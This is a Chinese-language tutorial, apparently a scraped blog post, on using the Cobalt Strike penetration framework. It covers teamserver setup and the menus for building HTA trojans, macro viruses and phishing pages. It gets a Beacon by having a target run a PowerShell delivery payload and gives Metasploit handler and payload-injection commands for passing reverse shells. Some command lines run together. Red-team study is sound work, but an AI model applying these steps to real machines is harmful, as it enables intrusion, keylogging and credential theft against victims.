Cobalt Strike简介

Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节,且其最大的优点在于可以进行团队合作和优越的UI界面。

Cobalt Strike文件结构

1.agscript 拓展应用的脚本
2.c2lint 检查profile的错误异常
3. cobaltstrike 客户端程序
4.cobaltstrike.jar
5.logs 日志
6.data TeamServer的一些数据
7.teamserver 团队服务器程序
8.update 用于更新Cobalt Strike
9.update.jar
10.third-party 第三方工具

Cobalt Strike使用

CobaltStrike分为客户端和服务端,Cobalt Strike 需要团队服务器才能使用。

(1)启动TeamServer
./teamserver 192.168.178.128 123456 #ip为本机服务器ip 123456为设置的密码

如果要将团队服务器部署在公网上,记得加强密码强度,防止团队服务器密码被破解
(2)启动Cobalt Strike Client

Host为团队服务器ip地址

Port为默认端口

User为连接的用户,用户可以自行选择

Password为团队服务器设置的密码

点击Connect连接之后

再点击是,则加入成功。

Cobalt Strike模块详解

Cobalt Strike模块

New Connection # 新建连接,支持连接多个服务器端
Preferences # 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录
Visualization # 主要展示输出结果的视图
VPN Interfaces # 设置VPN接口
Listenrs # 创建监听器
Script Manager # 脚本管理,可以通过AggressorScripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等
Close # 退出连接

View模块


Applications # 显示受害主机的应用信息
Credentials # 显示所有以获取的受害主机的凭证,如hashdump、Mimikatz
Downloads # 查看已下载文件
Event Log # 主机上线记录以及团队协作聊天记录
Keystrokes # 查看键盘记录结果
Proxy Pivots # 查看代理模块
Screenshots # 查看所有屏幕截图
Script Console # 加载第三方脚本以增强功能
Targets # 显示所有受害主机
Web Log # 所有Web服务的日志

Attacks模块

Packages

1.HTML Application                # 生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件
2.MS Office Macro                 # 生成office宏病毒文件
3.Payload Generator               # 生成各种语言版本的payload
4.Windows Executable              # 生成可执行exe木马
5.Windows Executable(Stageless)   # 生成无状态的可执行exe木马

Web-Drive-by

1.Manage                  # 对开启的web服务进行管理
2.Clone Site              # 克隆网站,可以记录受害者提交的数据
3.Host File               # 提供文件下载,可以选择Mime类型
4.Scripted Web Delivery   # 为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery
5.Signed Applet Attack    # 使用java自签名的程序进行钓鱼攻击(该方法已过时)
6.Smart Applet Attack     # 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(该方法已过时)
7.Spear Phish             # 鱼叉钓鱼邮件

Reporting模块

1.Activity Report                      # 活动报告
2.Hosts Report                         # 主机报告
3.Indicators of Compromise             # IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
4.Sessions Report                      # 会话报告
5.Social Engineering Report            # 社会工程报告:包括鱼叉钓鱼邮件及点击记录
6.Tactics, Techniques, and Procedures  # 战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
7.Reset Data                           # 重置数据
8.Export Data                          # 导出数据,导出.tsv文件格式

Help模块

1.Homepage             # 官方主页
2.Support              # 技术支持
3.Arsenal              # 开发者
4.System information   # 版本信息
5.About                # 关于

工具导航栏

1.1.新建连接
2.2.断开当前连接
3.3.监听器
4.4.改变视图为Pivot Graph(视图列表)
5.5.改变视图为Session Table(会话列表)
6.6.改变视图为Target Table(目标列表)
7.7.显示所有以获取的受害主机的凭证
8.8.查看已下载文件
9.9.查看键盘记录结果
10.10.查看屏幕截图
11.11.生成无状态的可执行exe木马
12.12.使用java自签名的程序进行钓鱼攻击
13.13.生成office宏病毒文件
14.14.为payload提供web服务以便下载和执行
15.15.提供文件下载,可以选择Mime类型
16.16.管理Cobalt Strike上运行的web服务
17.17.帮助
18.18.关于

利用Cobalt Strike获取一个Beacon

1、创建Listener

在Listeners的面板中点击Add

然后输入名称(任意),选择监听器类型,团队服务器ip和监听端口保存即可。

然后在监听的面板中就可以看到我们的监听器

在有了监听器之后,我们就可以选择我们的攻击模块进行漏洞利用了。我们这里选择Scripted Web Delivery攻击模块(为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery)

然后配置号监听端口和监听器后点击Launch

然后会生成一个payload

复制payload在powershell中执行,肉鸡即可上线

我们可以进如Interact的交互模式进行执行命令

Cobalt Strike功能详解

Listeners(监听模块)

在监听模块中内置了八个内置payload

1.wndows/beacon_dns/reverse_dns_txt
2.windows/beacon_http/reverse_http
3.windows/beacon_https/reverse_https
4.windows/beacon_bind_pipe
5.windows/beacon_tcp
6.windows/beacon_extc2
7.windows/foreign/reverse_http
8.windows/foreign/reverse_https

这些payload中windows/beacon为内置监听器,且有dns、http、https、smb、tcp、extc2六种监听方式,windows/foreign为外部监听器。

内置监听器的使用原理和之前配置监听器原理大致相同,这里主要再演示一下外部监听器的使用。

首先我们选择外置监听器Foreign模块,填写相关配置内容

然后打开在msf中配置相应监听模块

1.msf5 > use exploit/multi/handler
2.msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
3.msf5 exploit(multi/handler) > set lhost 192.168.178.128  #此处的IP地址和监听端口要和cs中设置的保持一致
4.msf5 exploit(multi/handler) > set lport 44441.msf5 exploit(multi/handler) > run

配置好之后我们就可以通过此监听器来传递我们的shell了,点击spawn

选择我们设置的msf这个外监听器

这样在msf这边就可以接受到cs这边传递过来的shell

这里讲述到了cs传递shell到msf,就不得不在提一提msf传递到cs了。

首先我们把刚才接受到的session退出,这里记住这个session的id为1

然后使用模块

1.msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject1.msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http  #切记这里的payload的协议要与cs的一致

选择上了这个模块之后我们在回到cs上创建一个监听器,我这里有个之前创建好的监听器

那我们继续回到msf上配置session和lhost和lport(切记这里的lhost和lport要和cs上监听器上配置的是一致的)

然后run执行在cs上等待上线即可。

Attacks(攻击模块)

Scripted Web Delivery

上面演示的是使用attacks模块中的scripted web delivery模块来进行拿到靶机的shell

这里有几个配置选项

1.URL Path:存放payload的位置
2.Local Host:团队服务器ip地址
3.Local Port:团队服务器端口
4.Listener:监听器
5.Type:要选择的脚本类型

全部配置好了之后,点击launch后,会弹出payload

在靶机上运行之后,靶机会在Teamserver下载payload,然后执行并加载到内存中,从而获取主机的Beacon。

Manage

我们生成的监听器和一些payload都能在这里进行管理。

Windows Executable

使用方法也和之前大致相同,配置好监听器和Output即可,这里的Output分为EXE和DLL两种类型。

1.Windows EXE:windows的可执行文件
2.Windows Service EXE:基于服务的windows可执行文件,可以将可执行文件添加到服务中。
3.Windows DLL:DLL文件,一般用于DLL劫持、提权和反弹Beacon。

Payload Generator

配置监听器,选择对应脚本语言即可。

Cobalt Strike基本使用相关推荐

  1. Cobalt Strike 的安装与简单使用

    一.什么是Cobalt Strike Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动. 二.如何使用 Cobalt Strik ...

  2. cobaltstrike扩展_Malwarebytes:使用可变C2下发Cobalt Strike的APT攻击

    6月中旬,Malwarebytes Labs的研究人员发现了一个伪装成简历的恶意Word文档,该文档使用模板注入来删除.Net Loader.研究人员认为这是与APT攻击有关的多阶段攻击的第一部分.在 ...

  3. Mac安装Cobalt Strike 4 【亲测有用】

    Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS.早期以Metasploit为基础的GUI框架式渗透测试工具,而现在Cobalt Strike已经不再使用MS ...

  4. Cobalt Strike 3.13的新功能

    Cobalt Strike 3.13现已推出.此版本添加了TCP Beacong,进程参数欺骗,并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons. TCP Beacon Co ...

  5. cobalt strike profile

    cobalt strike 配置解读 此处以最新版 jquery-c2.4.3.profile文件解析 适应Cobalt Strike 4.3 版本 其他版本会有标注 cobalt strike 4. ...

  6. Cobalt Strike 域内渗透

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...

  7. gophish配合邮件服务器,【CS】Cobalt Strike发送钓鱼邮件

    0x00 简介 关于Spear phish 和发件人伪造的工具有很多个,比如gophish.SimpleEmailSpoofer.命令行工具swaks等,每个工具都有其特点,当然Cobalt Stri ...

  8. MoveKit:一款功能强大的Cobalt Strike横向渗透套件

    关于MoveKit MoveKit是一款功能强大的Cobalt Strike横向渗透套件,本质上来说MoveKit是一个Cobalt Strike扩展,它利用的是SharpMove和SharpRDP ...

  9. DAY41:Cobalt Strike 工具使用

    DAY41:Cobalt Strike 工具使用 1.Cobalt Strike 概述 ​ Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器. ​ 自 3.0 以后已 ...

  10. Cobalt Strike 提权

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...

最新文章

  1. 有没有什么高效「炼丹」神器可以推荐?复旦fastNLP团队祭出内部调参利器fitlog...
  2. 十分钟完成Bash 脚本进阶!列举Bash经典用法及其案例
  3. python创建对象后调用对象的方法,报错TypeError: getName() takes 0 positional arguments but 1 was given
  4. 笑傲江湖霍建华版电子相册
  5. POJ - 2135 Farm Tour(最小费用最大流)
  6. Bash脚本教程之基本语法
  7. 事理逻辑为核心的自然语言处理理论实践与工业探索项目
  8. http 错误 404.0 - not found_电脑Regsvr32 用法和错误消息的说明
  9. MySQL 视图的基础操作(五)
  10. 一个准毕业生的2012年总结
  11. 你模型的变量符合业务逻辑了吗
  12. imgcms php,imgcms IMGCMS PHP image management system - 下载 - 搜珍网
  13. 【写作技巧】毕业设计的附录放在论文的哪个位置?
  14. BZOJ5248:[九省联考2018]一双木棋——题解
  15. 谈谈为什么要系统学习算法-开复的一篇文章
  16. you are not allowed to push code to protected branches on this project
  17. 收费英超与中国球迷相互抛弃
  18. Abaqus有限元分析软件介绍
  19. 二字动词 复盘赋能_【格格读书成长营】用复盘来为自己赋能
  20. Html单选按钮自定义样式

热门文章

  1. 用python制作条形图时出现“posx and posy should be finite values”问题的解决方法
  2. 记:从零开始讲解UDS(一)——协议概述
  3. E. Carrots for Rabbits(贪心)
  4. RabbitMQ中重试机制的坑
  5. 全网手机号码归属地号段总数量70W条
  6. Node.js 前世今生
  7. surface 通过U盘 镜像恢复系统
  8. 基于FPGA的数字秒表设计(含程序)
  9. android 选择答题功能,Android实现选择题答题(包括单选、多选和答题卡)
  10. AB testing之两大陷阱